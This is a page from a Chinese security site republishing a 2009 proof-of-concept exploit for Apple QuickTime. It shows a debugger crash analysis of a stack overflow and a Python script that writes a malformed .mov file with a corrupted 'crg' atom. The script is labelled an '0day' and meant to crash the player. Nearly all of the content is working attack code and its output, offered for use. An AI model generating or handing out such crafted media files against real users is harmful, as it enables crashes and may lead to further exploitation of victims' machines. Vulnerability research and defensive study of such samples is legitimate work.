首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Apple QuickTime CRGN Atom Local Crash Exploit
来源:vfocus.net 作者:vfocus 发布时间:2009-06-17  
#0:000> !exploitable -v
#HostMachine\HostUser
#Executing Processor Architecture is x86
#Debuggee is in User Mode
#Debuggee is a live user mode debugging session on the local machine
#Event Type: Exception
#Exception Faulting Address: 0x66830f9b
#First Chance Exception Type: STATUS_STACK_OVERFLOW (0xC00000FD)
#
#Faulting Instruction:66830f9b push ebx
#
#Basic Block:
#    66830f9b push ebx
#       Tainted Input Operands: ebx
#    66830f9c push ebp
#    66830f9d mov ebp,dword ptr <unloaded_papi.dll>+0x41f (00000420)[esp]
#    66830fa4 push esi
#    66830fa5 push edi
#    66830fa6 mov edi,ecx
#    66830fa8 cmp edi,offset <unloaded_papi.dll>+0x5ff (00000600)
#    66830fae mov ebx,edx
#    66830fb0 mov dword ptr [esp+14h],eax
#    66830fb4 mov byte ptr [esp+10h],0
#    66830fb9 mov byte ptr [esp+11h],0
#    66830fbe mov byte ptr [esp+12h],0
#    66830fc3 je quicktime!dllmain+0x2fbc4 (668310a4)
#
#Exception Hash (Major/Minor): 0x614b6671.0x614b786e
#
#Stack Trace:
#QuickTime!DllMain+0x2fabb
#<Unloaded_papi.dll>+0x1231137
#Instruction Address: 0x66830f9b
#
#Description: Stack Overflow
#Short Description: StackOverflow
#Exploitability Classification: UNKNOWN
#Recommended Bug Title: Stack Overflow starting at QuickTime!DllMain+0x2fabb (Hash=0x614b6671.0x614b786e)

print "------------------------------"
print "w3bd3vil [at] gmail [dot] com"
print "Apple QuickTime CRGN Atom 0day"
print "------------------------------"
bytes = [
0x00, 0x00, 0x00, 0x18, 0x66, 0x74, 0x79, 0x70, 0x33, 0x67, 0x70, 
0x35, 0x00, 0x00, 0x01, 0x00, 0x33, 0x67, 0x70, 0x35, 0x33, 0x67, 
0x70, 0x34, 0x00, 0x00, 0x01, 0x16, 0x6D, 0x6F, 0x6F, 0x76, 0x00, 
0x00, 0x00, 0x6C, 0x6D, 0x76, 0x68, 0x64, 0x00, 0x00, 0x00, 0x00, 
0xBF, 0x88, 0x12, 0x28, 0xBF, 0x88, 0x12, 0x28, 0x00, 0x00, 0x02, 
0x58, 0x00, 0x00, 0x0B, 0x90, 0x00, 0x01, 0x00, 0x00, 0x01, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 
0xA2, 0x74, 0x72, 0x61, 0x6B, 0x00, 0x00, 0x00, 0x5C, 0x74, 0x6B, 
0x68, 0x64, 0x00, 0x00, 0x00, 0x01, 0xBF, 0x88, 0x12, 0x28, 0xBF, 
0x88, 0x12, 0x28, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x0B, 0x90, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 
0x00, 0x00, 0xB0, 0x00, 0x00, 0x00, 0x90, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x1A, 0x63, 0x6C, 0x69, 0x70, 0x00, 0x00, 0x00, 0x0E, 0x63, 
0x72, 0x67, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 
0xFF, 0xFF, 0x00, 0x00, 0x00, 0x24, 0x65, 0x64, 0x74, 0x73, 0x00, 
0x00, 0x00, 0x1c, 0x65, 0x6c, 0x73, 0x74, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x0b, 0x90, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x66, 0x72, 
0x65, 0x65, 0x00, 0x00, 0x00, 0x08, 0x66, 0x72, 0x65, 0x65 ]

f = open("webDEViL.mov", "wb")
for byte in bytes: f.write("%c" % byte)
f.close()
print "webDEViL.mov created! (%d bytes)" % len(bytes)

# [2009-06-15]

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Joomla Component com_ijoomla_r
·WordPress Plugin Photoracer 1.
·TorrentTrader Classic 1.09 Mul
·phpCollegeExchange 0.1.5c (lis
·Apple Safari & Quicktime Denia
·Netgear DG632 Router Authentic
·Evernew Free Joke Script 1.2 R
·Netgear DG632 Router Remote De
·LinkLogger 2.4.10.15 (syslog)
·vBulletin Radio and TV Player
·AdaptWeb 0.9.2 (LFI/SQL) Multi
·phportal v1 (topicler.php id)
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved